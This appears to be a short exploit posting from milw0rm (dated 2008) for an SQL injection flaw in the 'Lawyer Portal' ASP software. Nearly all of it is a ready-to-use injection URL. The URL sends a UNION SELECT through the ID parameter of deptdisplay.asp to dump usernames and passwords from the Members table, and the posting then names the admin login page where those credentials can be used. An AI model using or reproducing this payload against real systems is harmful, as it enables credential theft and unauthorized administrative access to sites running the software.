23 lines
No EOL
539 B
Text
23 lines
No EOL
539 B
Text
#By Osmanizim
|
|
#Security Specialist
|
|
#Contacts > :( www.osmanizim.com
|
|
#Title: Lawyer Portal <= SQL Injection Vulnerability.
|
|
#Download:http://www.sepcity.com/free_lawyer_portal_software.aspx
|
|
#Demo : http://freeasp.sepcity.com/faculty/default.asp
|
|
|
|
|
|
|
|
// Exploit -->
|
|
|
|
|
|
http://localhost/faculty/deptdisplay.asp?ID=1 union select 0,1,2,3,Username,userpassword,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from Members
|
|
|
|
|
|
|
|
|
|
// Admin -->
|
|
|
|
|
|
http://localhost/faculty/login.asp
|
|
|
|
# milw0rm.com [2008-12-29] |